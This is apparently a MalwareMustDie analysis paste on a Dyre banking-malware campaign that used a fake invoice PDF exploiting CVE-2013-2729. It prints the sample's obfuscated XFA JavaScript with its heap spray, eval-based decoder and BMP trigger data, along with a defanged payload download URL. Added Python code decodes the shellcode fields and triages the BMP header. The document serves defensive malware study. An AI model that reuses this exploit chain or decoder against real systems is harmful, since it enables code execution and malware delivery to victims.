- // #MalwareMustDie! ITW Campaign of Dyre Malware via Exploit CVE-2013-2729 PDF.
- // Exploitation: Adobe Reader X BMP/RLE heap corruption
- // CVE: CVE-2013-2729
- // thanks: @nickschroedl (for forcing me to wake up and analyse this) @SeraphimDomain (for helping to recognize this new malware)
- // Tweets:
- https://twitter.com/nickschroedl/status/522412815265845248
- https://twitter.com/MalwareMustDie/status/522464893090684928
- https://twitter.com/SeraphimDomain/status/522464989957746689
- //-------------------------
- // Sample:
- //-------------------------
- MD5 : 536445d39de9f19947aa493c1ee57751
- SHA256 : 6b6fdc4b116802728ec763ac7b25472046465dd0cf58146b3755e7efcb83f135
- File size 465.6 KB ( 476741 bytes )
- // PDFiD
- This PDF document has an invalid cross reference table.
- This PDF document contains AcroForm objects. AcroForm Objects can
- specify and launch scripts or actions, that is why they are often
- abused by attackers.
- This PDF document has 1 page, please note that most malicious PDFs have
- only one page.
- This PDF document has 6 object start declarations and 6 object end
- declarations.
- This PDF document has 2 stream object start declarations and 2 stream
- object end declarations.
- This PDF document has a cross reference table (xref).
- This PDF document has a pointer to the cross reference table
- (startxref).
- This PDF document has a trailer dictionary containing entries allowing
- the cross reference table, and thus the file objects, to be read.
- // ExifTool
- MIMEType application/pdf
- FileCreateDate 2014:10:16 04:08:59+01:00
- FileType PDF
- Linearized No
- FileAccessDate 2014:10:16 04:08:59+01:00
- Warning Invalid xref table
- PDFVersion 1.7
- // VT Metadata (ITW info)
- First submission 2014-10-15 13:31:37 UTC ( 13 hours, 38 minutes ago )
- Last submission 2014-10-16 03:08:49 UTC ( 1 minute ago )
- File names sample.pdf
- VIRUS_invoice621785.pdf
- invoice621785.pdf
- invoice621785.pdf
- invoice621785.pdf
- BAD-invoice621785.pdf
- 536445d39de9f19947aa493c1ee57751.pdf
- vti-rescan
- invoice621785.txt
- invoice621785 - Copy.pdf
- invoice621785.pdf
- file-7580290_pdf
- Virus-invoice621785.pdf
- vti-rescan
- invoice621785.txt
- invoice621785.txt
- invoice621785 - Copy.pdf
- invoice621785.pdf
- file-7580290_pdf
- Virus-invoice621785.pdf
- invoice621785.pdf
- invoice621785b.pdf
- invoice621785.pdf
- base64.pdf
- !!!!VIRUS!!!! invoice621785.pdf
- 1.invoice621785.pdf
- attch.pdf
- 536445d39de9f19947aa493c1ee57751
- invoice621785.pdf
- invoice621785.pdf
- 111111111.pdf
- invoice621785.pdf.malware
- // ---------------------------------------
- // Hostile script (Javascript detected)
- // Analysis is in the comments marked "// MMD: ..."
- // by @unixfreaxjp
- // ---------------------------------------
- <script name="im" contentType="application/x-javascript">
- // MMD: This part of the script triggers the shellcode that calls URLDownloadToCacheFileA
- var oxi = "";
- var JH = "";
- var VMeaD = function(a){return HqmB.call(a,a);};
- var Q5Bm = "";
- String.prototype.trim=function(){return this.replace(/^[\s\n\r\t]+|\s\n\r\t]+$/g, '');};
- function ymE4(zzz, sss, sdsds) {
- switch (zzz)
- {
- case 1:
- return AY(sss);
- break;
- case 2:
- return OnVk(sss, sdsds);
- break;
- case 3:
- return Muv0S(sss);
- break;
- case 4:
- return HIZx(sss);
- break;
- case 5:
- return xt4(sss);
- break;
- }
- }
- function EiBY(x){
- return Et(x);
- }
- function mG05X(n)
- {
- var w = form2.Text100.name;
- var s = [];
- n = n.trim();
- var m = cMZ(Bu4g8);
- m = cMZ(oCnr);
- var ar = cMZ("[" + m + "]");
- var tt = (w.length > 3) ? 1 : 2;
- for (var i = 0; i < ar.length; i ++)
- {
- var a = ar[i];
- var b = (tt == 1) ? 0x33 : 0x40;
- var j = ( a & ~b ) | ( ~a & b );
- if ((j >= 33) && (j <= 126))
- {
- s[i] = String.fromCharCode(33 + ((j + 14) % 94));
- }
- else
- {
- s[i] = String.fromCharCode(j);
- }
- }
- return s.join('');
- }
- function a2c(a)
- {
- ter="";
- for (var i in a)
- ter+= String.fromCharCode(a[i]);
- return ter;
- }
- function HqmB(a, b, c, d){
- var x = form2.Text100.name;
- var y = this[a];
- x = x + '3';
- return y;
- }
- function parOM(aaa) {
- var ret;
- var w = form2.Text100.name;
- var tt = (w.length > 3) ? 1 : 2;
- ret = (tt == 1) ? VMeaD(aaa) : null;
- return ret;
- }
- var ma = "5t5in55f5o55har5o5ee5a5u5es5a5e";
- var upd = "Srg.rmCCdvlncp";
- var upd0 = "";
- var ii = 0;
- for (var i=0; i < ma.length; i++)
- {
- if(ma[i] != "5")
- upd0 += ma[i];
- else
- upd0 += upd[ii++];
- }
- var cMZ = parOM(upd0.slice(19,23));
- var VUSO = cMZ(upd0.slice(23));
- var ge = [0x33, 0x77, 0x6A, 0x75, 0x71, 0x66, 0x68, 0x6A];
- var z3 = [0x5C, 0x64, 0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x27, 0x29];
- var z4 = [0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x2C, 0x27, 0x29];
- var z1 = [0x28, 0x2F, 0x5B, 0x5E, 0x5C, 0x78, 0x32, 0x46];
- for(var q = 0; q < ge.length; q++)
- Q5Bm += String.fromCharCode(ge[q]-5);
- var z2 = [0x28, 0x2F, 0x5B, 0x5C, 0x78, 0x32, 0x46];
- var Bu4g8 = "n" + Q5Bm + a2c(z1) + a2c(z3);
- var oCnr = "m" + Q5Bm + a2c(z2) + a2c(z4);
- cMZ(mG05X(xfa.resolveNode("Text101").rawValue)); // MMD: draw za BMP as raw!
- </script>
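The mG05X() routine above is the whole decoder for the Text101/Text102 draw fields: Bu4g8/oCnr strip the letters and turn the '/'-separated numbers into an array, cMZ is eval, and each number is XORed with 0x33 (the branch taken because "Text100" is longer than 3 characters) and then rotated by 14 over printable ASCII. The following Python port is an added example, not code from the paste or from MalwareMustDie; function names are mine, and encode_field() is the inverse I derived so a constructed round-trip can be checked.

```python
# Added example (not code from the original paste): Python port of the mG05X()
# decoder, so the Text101/Text102 fields can be decoded offline without
# running the hostile script.
import re

XOR_KEY = 0x33  # 'b' in mG05X when form2.Text100.name is longer than 3 chars


def field_to_numbers(raw_value):
    """Bu4g8 + oCnr: keep only '/' and digits, then split into integers."""
    stripped = re.sub(r"[^/\d]", "", raw_value.strip())
    return [int(tok) for tok in stripped.split("/") if tok]


def decode_number(a, key=XOR_KEY):
    """One iteration of the mG05X loop."""
    j = a ^ key  # (a & ~b) | (~a & b) is plain XOR
    if 33 <= j <= 126:
        return chr(33 + ((j + 14) % 94))
    return chr(j)


def decode_field(raw_value, key=XOR_KEY):
    """Return the string the hostile script hands to eval (cMZ)."""
    return "".join(decode_number(a, key) for a in field_to_numbers(raw_value))


def encode_field(plain, key=XOR_KEY):
    """Inverse transform (my derivation); used only to build a constructed test vector."""
    tokens = []
    for ch in plain:
        c = ord(ch)
        j = 33 + ((c - 80) % 94) if 33 <= c <= 126 else c
        tokens.append("k%d" % (j ^ key))  # the letter prefix is discarded by the decoder
    return "/".join(tokens)


# First two lines of the Text101 field, quoted from the dump above.
TEXT101_HEAD = ("nAB57/Vaod57/ASto19/MqbD19/ibPf19/dUaq19/bsX19/hZqj19/djwh19/sJU19/ciQ74/"
                "wiM68/CyA19/gjVQ95/TAY19/BkG98/hzj30/uPDm117/Onw108/tiEi86/oKIU5/hqE0/JhYZ30/")

if __name__ == "__main__":
    # Decodes to an assignment to JH, the variable declared at the top of script "im".
    print(repr(decode_field(TEXT101_HEAD)))
    # Constructed round-trip input, showing the transform is a bijection on 7-bit text.
    sample = 'var x = "hi";\n'
    print(decode_field(encode_field(sample)) == sample)
```

Run against the quoted Text101 head, the output starts `JH = "\u06eb\...`, i.e. the field holds a unicode-escaped string assigned to the JH variable of script "im".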
- <script name="i3d" contentType="application/x-javascript">
- var D4W=0x12e; // MMD: These are the variables and arrays used by the heap spray
- var Ibv2 = 200;
- var of4 = 0;
- var KsK = new Array(Ibv2);
- var xS = new Array(Ibv2);
- var URP = new Array(Ibv2);
- var cVqW = new Array(Ibv2/2);
- </script>
- <?templateDesigner expand 1?>
- </variables>
- <subform w="576pt" h="756pt">
- <field name="Image301">
- <ui> <imageEdit/> </ui>
- <value>
- <image1>
- </image1>
- <image2>
- </image2>
- <image>
- Qk0AAAAACgAUAAAAAABAAAAALgEAAAEAAAABAAgAAQAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAUkdC
- QVJHQkEAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
- AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAA
- Av8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC
- (...)
- /AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
- AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAvgAAAgBAAAAAAAnBQACAKsAAgCrAAIA
- qwACAKsAAgCrAAIAqwACAKsAAgCrAAIAqwACAKsACkxMTExMTExMTEw=
- </image>
- </value>
- </field>
- </subform>
- <event activity="initialize" name="s9"> // MMD: The initialization of this exploit
- <script contentType="application/x-javascript">
- // MMD: Known exploit: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
- var i; var j; // MMD: prep memory layout
- if (i3d.of4 == 0){
- var VYz = "\u5858\u5858\u5678\u1234"; // MMD: Trigger usage of LFH
- var yGUaT = i3d.D4W/2-1-(VYz.length+2+2);
- for (i=0; i < i3d.Ibv2; i+=1) // MMD: HEAP SPRAY starts here...
- i3d.KsK[i] = VYz + im.ymE4(1,i) +
- im.oxi.substring(0, yGUaT) +
- im.ymE4(1,i) + "";
- for (j=0; j < 1000; j++)
- for (i=i3d.Ibv2-1; i > i3d.Ibv2/4; i-=10)
- i3d.KsK[i]=null;
- i3d.of4 = 1;
- }
- </script>
- </event>
- <draw name="Text101" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP data..
- <ui>
- <textEdit/>
- </ui>
- <value>
- <text>
- nAB57/Vaod57/ASto19/MqbD19/ibPf19/dUaq19/bsX19/hZqj19/djwh19/sJU19/ciQ74/
- wiM68/CyA19/gjVQ95/TAY19/BkG98/hzj30/uPDm117/Onw108/tiEi86/oKIU5/hqE0/JhYZ30/
- usK117/YIm108/Bhdo108/MaNB108/PFDn108/JbOL30/CGMs117/VWMI108/yzhj108/yhQB108/xNM108/CjlK30/
- oUh117/kZl108/vTFa87/Hhv5/KqKY0/lntm30/OupY117/wKf4/Qtm91/fpK5/vrE84/zAMl30/
- zwXA117/Uogl4/qar4/tnt4/Rasi4/afD30/voQK117/Egym87/SQPT1/AkT4/aUb4/DPvN30/
- // REDACTED //
- Yxyf19/neFH19/RKma19/LHyB19/OEGp19/Ehz19/Zbg112/IBKF5/xBm118/WEX117/aMe112/nnN12/
- NHo19/Weo108/MqI122/SlHY81/mPpX108/sExj81/skCl108/fiNA81/IEM108/wBv81/ajgZ108/HxeO105/
- svCP108/wiY122/jDB83/NDq83/IFD83/zmd83/egCw83/inu83/FMI83/jGm83/lns89/qBNI57/
- OYo19/EmDw19/aMTN19/IBY19/JrIr19/MYaP19/bCb19/rDP19/YxT19/LcEi19/TMLx19/RbB19/
- cWW125/quOE57
- </text>
- </value>
- <font typeface="Myriad Pro"/>
- <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
- </draw>
- <draw name="Text102" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP data...
- <ui>
- <textEdit/>
- </ui>
- <value>
- <text>
- HdGi57/SVEQ19/bHL19/IEzq19/EzZ19/dRa19/Mub19/WPhU19/Vlq19/VYc19/volf19/
- Dsb19/lhR19/WFD116/lIYx1/FpDd112/lKte19/gMJ9/tcqB89/Xsv19/yMHX116/Shc1/VKU112/
- RIW19/xIfM8/NVpN89/WAwg57/YMaE57/QZUu19/cVw19/gmwi19/tmX19/lrD19/FTO19/LDW19/
- PYqG19/UjjX19/usBd19/AnCr19/OUN19/fsfs116/EQdz1/nJaF112/vOaF19/IIh69/aUCU85/FkBB19/
- XMU95/eWm19/tSCt111/OvPr83/ebSW89/lZp57/GPK19/Agx19/YijV19/DHP19/vYA19/HwHC19/
- // REDACTED //
- iOIW125/tmL89/kmi57/ixHF19/tlc19/udz19/tywc19/xuvx19/QURZ19/jzM19/gYAV19/wOlg19/
- qMoN19/tADX19/kKlU19/Bqe5/dtnQ116/tux5/aoud12/ZBy118/qsj110/FWr118/FPew1/KlL112/
- rXA11/aHLY5/dwa118/lce110/Sxz7/icC14/HdnR115/Eegv119/aAry5/bFE64/MBpo115/nzsy7/
- hTK100/REHt118/RFCP112/MvS117/sjLK5/hmK107/QTw89/lcHy57
- </text>
- </value>
- <font typeface="Myriad Pro"/>
- <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
- </draw>
- // MMD: form layout is rendered and the bug triggered
- <event activity="docReady" ref="$host" name="EVde">
- <script contentType="application/x-javascript"> // MMD: runs once the page is ready
- im.cMZ(im.mG05X(xfa.resolveNode("Text102").rawValue)); // MMD: draw za raw!
- </script>
- </event>
- </subform>
- <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
- <?templateDesigner DefaultLanguage JavaScript?>
- <?templateDesigner DefaultRunAt client?>
- <?acrobat JavaScript strictScoping?>
- <?PDFPrintOptions embedViewerPrefs 0?>
- <?PDFPrintOptions embedPrintOnFormOpen 0?>
- <?PDFPrintOptions scalingPrefs 0?>
- <?PDFPrintOptions enforceScalingPrefs 0?>
- <?PDFPrintOptions paperSource 0?>
- <?PDFPrintOptions duplexMode 0?>
- <?templateDesigner DefaultPreviewType interactive?>
- <?templateDesigner DefaultPreviewPagination simplex?>
- <?templateDesigner XDPPreviewFormat 19?>
- <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
- <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
- <?templateDesigner Zoom 119?>
- <?templateDesigner FormTargetVersion 30?>
- <?templateDesigner SaveTaggedPDF 1?>
- <?templateDesigner SavePDFWithEmbeddedFonts 1?>
- <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
- <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 ">
- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
- <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
- <xmp:MetadataDate>2014-08-20T20:14:14Z</xmp:MetadataDate>
- <xmp:CreatorTool>Adobe LiveCycle Designer 11.0</xmp:CreatorTool>
- </rdf:Description>
- <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
- <pdf:Producer>Adobe LiveCycle Designer 11.0</pdf:Producer>
- </rdf:Description>
- <rdf:Description xmlns:desc="http://ns.adobe.com/xfa/promoted-desc/" rdf:about="">
- <desc:version rdf:parseType="Resource">
- <rdf:value>11.0.0.20130303.1.892433.887364</rdf:value>
- <desc:ref>/template/subform[1]</desc:ref>
- </desc:version>
- </rdf:Description>
- </rdf:RDF>
- </x:xmpmeta>
- <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
- <annots/>
- </xfdf></xdp:xdp>
- // Exploit: CVE-2013-2729
- // Details:
- [quoted] Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727. [/quoted]
- [quoted] The issue presented on this CVE is related to the parsing of a BMP file compressed with RLE8.
- The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive
- PDF form. The DLL responsible for handling the embedded XFA interactive forms (and the BMP) is
- the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code. [/quoted]
- [quoted] The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules
- that allow businesses to build interactive forms. At its simplest, a template-based grammar defines fields
- in which a user provides data. Among others it defines buttons, textfields, choicelists, images and
- a scripting API to validate the data and interact. It supports JavaScript, XSLT and FormCalc
- as scripting languages. One can build a PDF containing an XFA Form containing an image [/quoted]
- Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729
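Since the bug is in the RLE8 BMP parser, the first thing to check on a suspicious XFA form is the header of its embedded image. The following Python is an added example, not code from the paste or from MalwareMustDie: it base64-decodes the first line of the `<image>` element from the dump above and reports the BITMAPFILEHEADER/BITMAPINFOHEADER fields, with a few flagging heuristics of my own; function and field names are mine.

```python
# Added example (not code from the original paste): triage of the BMP header
# carried in the <image> element of the XFA form above.
import base64
import struct

BI_RLE8 = 1  # biCompression value for 8-bit run-length encoding

# First base64 line of the <image> element, quoted from the dump above. It covers
# the 14-byte file header and the first 40 bytes of the info header.
IMAGE_B64_HEAD = "Qk0AAAAACgAUAAAAAABAAAAALgEAAAEAAAABAAgAAQAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAUkdC"


def decode_b64_prefix(text):
    """Decode a truncated base64 fragment: drop any trailing partial quantum."""
    text = "".join(text.split())
    return base64.b64decode(text[: len(text) - len(text) % 4])


def parse_bmp_header(data):
    """Return the file header and info header fields as a dict (little-endian)."""
    if len(data) < 38 or data[:2] != b"BM":
        raise ValueError("not a BMP header")
    _, bf_size, res1, res2, off_bits = struct.unpack_from("<2sIHHI", data, 0)
    (bi_size, width, height, planes, bpp,
     compression, size_image) = struct.unpack_from("<IiiHHII", data, 14)
    return {
        "bfSize": bf_size, "bfReserved": (res1, res2), "bfOffBits": off_bits,
        "biSize": bi_size, "biWidth": width, "biHeight": height, "biPlanes": planes,
        "biBitCount": bpp, "biCompression": compression, "biSizeImage": size_image,
    }


def rle8_findings(hdr):
    """Points worth flagging on an XFA-embedded BMP (heuristics, not a verdict)."""
    findings = []
    if hdr["biCompression"] == BI_RLE8 and hdr["biBitCount"] == 8:
        findings.append("8-bit RLE8 BMP, the format this CVE's parser bug is in")
    if hdr["bfSize"] == 0 or hdr["bfOffBits"] == 0:
        findings.append("bfSize/bfOffBits are zero: file header is not usable")
    if hdr["bfReserved"] != (0, 0):
        findings.append("reserved file header fields are non-zero")
    if hdr["biSize"] != 40:
        findings.append("biSize is %d, not the 40 of a BITMAPINFOHEADER" % hdr["biSize"])
    return findings


def triage_image_b64(b64_text):
    """Parse the header out of base64 text and return (fields, findings)."""
    hdr = parse_bmp_header(decode_b64_prefix(b64_text))
    return hdr, rle8_findings(hdr)


if __name__ == "__main__":
    header, flags = triage_image_b64(IMAGE_B64_HEAD)
    print(header)
    print("\n".join(flags))
```

The decoded header reports an 8-bit image with biCompression = 1 (RLE8), one row high and 0x12e (302) pixels wide, the same constant script "i3d" keeps in D4W for the spray.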
- // Hostile URL post exploit:
- Malicious API download executed: \KnownDlls\NTMARTA.DLL origin: URLDownloadToCacheFileA
- h00p://rlmclahore.com/resources/search/1510out.exe
- Network: 70.34.33.140|static-ip-70-34-33-140.net-70-34-33-0.rdns.managed.com.|40561 | 70.34.32.0/21 | MOBILENOW | US | POWERDNN.COM | POWER DNN
- // PoC: the download is executed depending on the browser/PDF environment
- https://lh6.googleusercontent.com/-qYEkGH0sWio/VD88vayVXCI/AAAAAAAARZ0/t6UkaJYv32E/s747/003.png
- Payload: Dyre
- https://www.virustotal.com/en/file/3f23306c3b94fc2d594836e972e32f2cc4a19787ed3d561dc0bfe52970798f70/analysis/
- // ---
- // MalwareMustDie!